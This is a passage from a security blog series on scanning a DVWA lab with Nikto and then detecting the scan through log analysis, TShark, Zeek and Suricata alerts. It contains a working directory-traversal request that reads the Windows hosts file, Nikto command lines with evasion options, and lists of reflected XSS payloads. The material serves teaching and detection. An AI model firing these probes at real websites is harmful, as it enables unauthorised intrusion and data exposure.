</span><span style="color: white;">9 0.009599451 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0</span><span style="color: white;">
</span><span style="color: white;">10 0.009615795 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0</span><span style="color: white;">
</span><span style="color: white;">11 0.009623869 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0</span><span style="color: white;">
</span><span style="color: white;">12 0.009635647 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0</span><span style="color: white;">
</span><span style="color: white;">13 0.011856522 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0</span><span style="color: white;">
</span><span style="color: white;">14 0.012227611 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0</span><span style="color: white;">
</span><span style="color: white;">15 0.012227889 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0</span><span style="color: white;">
</span><span style="color: white;">16 0.012271428 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0</span>
</pre></div>
</div><div><br /></div><div>How many conversations were part of this communication?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ tshark -n -r fi.pcap -q -z conv,tcp</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107:59456 <-> 10.0.0.106:80 7 4,853 bytes 9 662 bytes 16 5,515 bytes 0.000000000 0.0123</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Following stream <i>0</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span>└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 0</span>
<span>Node 0: 10.0.0.107:59456</span>
<span>Node 1: 10.0.0.106:80</span>
<span>156</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
#.127.0.0.1 localhost
#.::1 localhost
10.0.0.107 mycooldomain.cdw</span>
<!DOCTYPE html>
</pre></div>
</div><div><br />The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see the full contents above. As we say in the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503 - Network Monitoring and Threat Detection</a> - <b><i>Packets or it did not happen</i></b>. This is clear evidence of this.</div><div><br /></div><div>Transitioning to Zeek</div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div><div>Setup Zeek.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1 </span>
<span style="color: white;">1686078799.407770 C0NrKC2wb8TbvK0iZb 10.0.0.107 39234 10.0.0.106 80 53 GET 10.0.0.106 /0RHy...JUNK...wGH/../favicon.ico - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 30894 200 OK - - (empty) - - - - - - F0bkFD4SgqIlRoiaQf - image/x-icon</span>
</pre></div>
</div><div><br /></div><div>Looking at the the actual attack traffic. We see similar to what we saw in our log analysis of the <i>access.log</i> file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat http.log </span>
<span style="color: white;">1686163005.810950 C7ccD83WRZobza0Lj9 10.0.0.107 59456 10.0.0.106 80 1 GET 10.0.0.106 /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts - 1.1 curl/7.88.1 - 0 4005 200 OK </span>
</pre></div>
</div><div><br /></div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br /></div><div><div>Setup Suricata to operate in IDS mode</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
</div><p><br />What did the IDS produce? Looking at the first 5 entries.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. </span>
<span style="color: white;"> 6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt </span>
<span style="color: white;"> 4 1:2101402:9] GPL EXPLOIT iissamples access </span>
<span style="color: white;"> 4 1:2101245:13] GPL EXPLOIT ISAPI .idq access </span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><div>Nothing above that I would like to dig deeper into.</div><p>Looking at the actual attack from the IDS perspective.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat fast.log </span>
<span style="color: white;">06/07/2023-14:36:45.810950 [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Looking at the packet.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat alert-debug.log </span>
<span style="color: white;">+================</span>
<span style="color: white;">TIME: 06/07/2023-14:36:45.810950</span>
<span style="color: white;">PKT SRC: wire/pcap</span>
<span style="color: white;">SRC IP: 10.0.0.107</span>
<span style="color: white;">DST IP: 10.0.0.106</span>
<span style="color: white;">PROTO: 6</span>
<span style="color: white;">SRC PORT: 59456</span>
<span style="color: white;">DST PORT: 80</span>
<span style="color: white;">TCP SEQ: 2738297529</span>
<span style="color: white;">TCP ACK: 2364260716</span>
<span style="color: white;">FLOW: to_server: TRUE, to_client: FALSE</span>
<span style="color: white;">FLOW Start TS: 06/07/2023-14:36:45.810580</span>
<span style="color: white;">FLOW PKTS TODST: 3</span>
<span style="color: white;">FLOW PKTS TOSRC: 1</span>
<span style="color: white;">FLOW Total Bytes: 404</span>
<span style="color: white;">FLOW IPONLY SET: TOSERVER: TRUE, TOCLIENT: TRUE</span>
<span style="color: white;">FLOW ACTION: DROP: FALSE</span>
<span style="color: white;">FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE</span>
<span style="color: white;">FLOW APP_LAYER: DETECTED: TRUE, PROTO 1</span>
<span style="color: white;">PACKET LEN: 210</span>
<span style="color: white;">PACKET:</span>
<span style="color: white;"> 0000 08 00 27 88 B8 34 08 00 27 DB 96 6A 08 00 45 00 ..'..4.. '..j..E.</span>
<span style="color: white;"> 0010 00 C4 75 E1 40 00 40 06 AF 7E 0A 00 00 6B 0A 00 ..u.@.@. .~...k..</span>
<span style="color: white;"> 0020 00 6A E8 40 00 50 A3 37 1A B9 8C EB C1 6C 50 18 .j.@.P.7 .....lP.</span>
<span style="color: white;"> 0030 01 F6 15 8B 00 00 47 45 54 20 2F 64 76 77 61 2F ......GE T /dvwa/</span>
<span style="color: white;"> 0040 76 75 6C 6E 65 72 61 62 69 6C 69 74 69 65 73 2F vulnerab ilities/</span>
<span><span style="color: white;"> 0050 66 69 2F 3F </span><span style="color: #fcff01;"><b>70 61 67 65 3D 2E 2E 2F 2E 2E 2F 2E</b></span><span style="color: white;"> fi/?</span><b><span style="color: #fcff01;">page =../../.</span></b></span><b style="color: #fcff01;">
</b><span style="color: #fcff01; font-weight: bold;"> 0060 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 77 69 6E 64 6F ./../../ ../windo</span><b style="color: #fcff01;">
</b><span style="color: #fcff01; font-weight: bold;"> 0070 77 73 2F 73 79 73 74 65 6D 33 32 2F 64 72 69 76 ws/syste m32/driv</span><b style="color: #fcff01;">
</b><span><b style="color: #fcff01;"> 0080 65 72 73 2F 65 74 63 2F 68 6F 73 74 73 </b><span style="color: white;">20 48 54</span><b style="color: #fcff01;"> ers/etc/ hosts</b></span><span style="color: white;"> HT</span>
<span style="color: white;"> 0090 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 TP/1.1.. Host: 10</span>
<span style="color: white;"> 00A0 2E 30 2E 30 2E 31 30 36 0D 0A 55 73 65 72 2D 41 .0.0.106 ..User-A</span>
<span style="color: white;"> 00B0 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 38 38 2E gent: cu rl/7.88.</span>
<span style="color: white;"> 00C0 31 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 1..Accep t: */*..</span>
<span style="color: white;"> 00D0 0D 0A ..</span>
<span>...</span>
</pre></div>
<p></p><p>Nothing else to look at here.</p><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-31797275137768558212023-12-12T18:26:00.000-08:002023-12-12T18:37:08.915-08:00Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.</p><p>Posts in this series:</p><p><span style="font-size: medium;"><b>The hack - Testing for injection types of attacks.</b></span></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106/dvwa -ipv4 -Display 2 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 4 -evasion 3 </span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ sent cookie: PHPSESSID=6d25e0unoqrfr1822r98chsjr3; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Premature URL ending</span>
<span style="color: white;">+ Start Time: 2023-06-02 13:37:42 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28</span>
<span style="color: white;">+ /dvwa/cgi.cgi/: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20p2zcHyr0eeyZKdsykh/../../dvwa/ sent cookie: PHPSESSID=jaes6gbb1elm9qft6eti7nbrl8; expires=Sat, 03-Jun-2023 17:37:21 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ /dvwa/: Retrieved x-powered-by header: PHP/8.0.28.</span>
<span style="color: white;">+ /dvwa/: Cookie security created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</span>
<span style="color: white;">+ /dvwa/: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> sent cookie: security=low; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> sent cookie: security=low; path=/</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20XUyeQs43O3P6ka/../../dvwa/phpinfo.php?cx[]=rYLxwx...zxZ2HcuXX<script>alert(foo)</script> sent cookie: PHPSESSID=adhqsj51ur05nph7mitqi9kfvc; expires=Sat, 03-Jun-2023 17:37:25 GMT; Max-Age=86400; path=/</span>
<span style="color: white;">+ /%20HTTP/1.1%0d%0aAccept%3a%20OME1Ins6pMdk8/../../dvwa/?xmlcontrol=body%20onload=alert(123) sent cookie: security=low; path=/</span>
<span style="color: white;">+ 958 requests: 0 error(s) and 10 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-02 13:37:45 (GMT-4) (3 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ 1 host(s) tested</span>
<span style="color: white;">---------------------------------------------------------------------------</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>From above, I was surprised to see some of the parameters such as "<i>index.php?dir=<script>alert('Vulnerable')</script></i>" sending the cookie. This caught me off guard as looking at the source of <i>index.php</i> does not show those parameters. Maybe I need to expand my knowledge on HTTP to get a better understanding of what transpired there.</p><p>Here are some of the unique parameters that were passed and their values. I'm going assume most of these are just values from the <i>Nikto</i> tool and not something it learned about from the page.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat tuning_4.txt | grep --perl-regexp 'index.php\?.*?</script>|phpinfo.php\?.*?</script>' --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">head --lines=20 | sort --unique </span>
<span style="color: white;">index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?action=storenew&username=<script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?dir=<script>alert('Vulnerable')</script></span>
<span style="color: white;">index.php?err=3&email=\"><script>alert(document.cookie)</script></span>
<span style="color: white;">index.php?file=Liens&op=\"><script>alert('Vulnerable');</script></span>
<span style="color: white;">index.php?option=search&searchword=<script>alert(document.cookie);</script></span>
<span style="color: white;">index.php?rep=<script>alert(document.cookie)</script></span>
<span style="color: white;">index.php?vo=\"><script>alert(document.cookie);</script></span>
<span style="color: white;">phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script></span>
<span style="color: white;">phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Time to transition to the log analysis to see if this will help my learnings.</p><p>To get more of attacking and detecting cross site scripting, see: <br /><a href="https://www.securitynik.com/2017/02/beginning-web-application-testing-cross.html">Learning by practicing: Beginning Web Application Testing - Cross Site Scripting (XSS)–DVWA (securitynik.com)</a><br /><br /></p><div><b><span style="font-size: medium;">Detect - Log Analysis</span></b></div><div><br /></div><div><div>Time to understand from the logs, what this Nikto attack look like</div><div><br /></div><div>Looking at the first 3 entries in the access log </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ head access.log --lines=3</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20oJaLwmzNOomj5k/../../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%209dezoCMqi7/../../dvwa/ HTTP/1.1" 200 5960 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.108 - - [02/Jun/2023:13:37:21 -0400] "GET /%20HTTP/1.1%0d%0aAccept%3a%20XvKT1obCp7xvYUFzg5/../../dvwa/cgi.cgi/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the HTTP methods.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 2 --delimiter '"' | cut -f 1 -d ' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 939 GET</span>
<span style="color: white;"> 9 POST</span>
<span style="color: white;"> 2 TRACK</span>
<span style="color: white;"> 2 OPTIONS</span>
<span style="color: white;"> 1 XULKCYAP</span>
<span style="color: white;"> 1 TRACE</span>
<span style="color: white;"> 1 <script>alert(1)</script></span>
<span style="color: white;"> 1 PUT</span>
<span style="color: white;"> 1 PROPFIND</span>
<span style="color: white;"> 1 DEBUG</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the response codes, we see 33 <i>200</i>. There are definitely also some interesting response returned where the response codes should have been. Maybe that was poor filtering on my part. However, this is not a major concern at this time.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | cut --fields 3 --delimiter '"' | cut --fields=2 --delimiter=' ' | sort | uniq --count | sort --numeric-sort --reverse </span>
<span style="color: white;"> 821 404</span>
<span style="color: white;"> 54 HTTP/1.1</span>
<span style="color: white;"> 33 200</span>
<span style="color: white;"> 17 403</span>
<span style="color: white;"> 9 Vulnerable\\\</span>
<span style="color: white;"> 5 test\\\</span>
<span style="color: white;"> 4 400</span>
<span style="color: white;"> 4 301</span>
<span style="color: white;"> 3 &lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\</span>
<span style="color: white;"> 1 ><script>alert(1)/script><\\\</span>
<span style="color: white;"> 1 ><Img%20Src=javascript:alert('Vulnerable')><Img%20Src=\\\</span>
<span style="color: white;"> 1 ><img%20src=\\\</span>
<span style="color: white;"> 1 hello\\\</span>
<span style="color: white;"> 1 417</span>
<span style="color: white;"> 1 405</span>
<span style="color: white;"> 1 302</span>
<span style="color: white;"> 1 >\\\</span>
</pre></div>
</div><div><br /></div><div>The script tag is definitely a cause for concern in this case. </div><div><br /></div><div>Peeking at a the first 5 records</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+" | cut --fields=2- --delimiter='"' | awk --field-separator=' 200 ' '{ print $1 }' | grep "script" --color=always | head --lines=5</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20ru6vqb1X2lXvU6PYe/../../dvwa/index.php?option=search&searchword=<script>alert(document.cookie);</script> HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20n6qmprr4FiSvDr7/../../dvwa/index.php?dir=<script>alert('Vulnerable')</script> HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20qMTw97IoYwjs/../../dvwa/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%206aNVKEwARt/../../dvwa/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; HTTP/1.1"</span>
<span style="color: white;">GET /%20HTTP/1.1%0d%0aAccept%3a%20j7vq9Hi1xXNr4X/../../dvwa/index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script> HTTP/1.1"</span>
</pre></div>
</div><div><br /></div><p>I must admit, I was surprised to see status code 200 for those entries above as, when I searched "<i>index.php</i>", I don't see any of those parameters, i.e. "<i>option</i>", "<i>file</i>", "<i>dir</i>", etc.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
<span style="color: white;">└─$ curl --request GET "http://10.0.0.106/dvwa/index.php" --silent | grep --perl-regexp --ignore-case 'type="text".*("action"|"searchFor"|"username"|"dir"|"err"|"file"|"op"|"rep"|"vo"|"GLOBALS[test]"|"VARIABLE")' | wc --lines </span>
<span style="color: white;">0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>To validate some of my knowledge, I used non existent parameters to target the site directly and still got status 200.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_4]</span>
